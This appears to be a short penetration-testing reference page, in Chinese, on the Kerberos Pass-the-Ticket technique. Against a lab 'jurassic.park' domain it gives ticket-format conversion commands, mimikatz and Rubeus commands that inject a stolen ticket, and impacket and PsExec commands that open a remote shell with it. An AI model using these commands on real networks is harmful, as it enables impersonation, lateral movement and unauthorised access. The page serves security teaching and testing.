Pass the Ticket

Reading time: 1 minute

Pass The Ticket (PTT)

在Pass The Ticket (PTT)攻击方法中，攻击者窃取用户的认证票据，而不是他们的密码或哈希值。这个被窃取的票据随后被用来冒充用户，从而在网络中获得对资源和服务的未授权访问。

阅读：

• 从Windows中收集票据
• 从Linux中收集票据

在平台之间交换Linux和Windows票据

ticket_converter工具仅使用票据本身和输出文件来转换票据格式。

python ticket_converter.py velociraptor.ccache velociraptor.kirbi
Converting ccache => kirbi

python ticket_converter.py velociraptor.kirbi velociraptor.ccache
Converting kirbi => ccache

在Windows中可以使用Kekeo。

Pass The Ticket攻击

export KRB5CCNAME=/root/impacket-examples/krb5cc_1120601113_ZFxZpK
python psexec.py jurassic.park/trex@labwws02.jurassic.park -k -no-pass

#Load the ticket in memory using mimikatz or Rubeus
mimikatz.exe "kerberos::ptt [0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi"
.\Rubeus.exe ptt /ticket:[0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi
klist #List tickets in cache to cehck that mimikatz has loaded the ticket
.\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd

参考

• https://www.tarlogic.com/blog/how-to-attack-kerberos/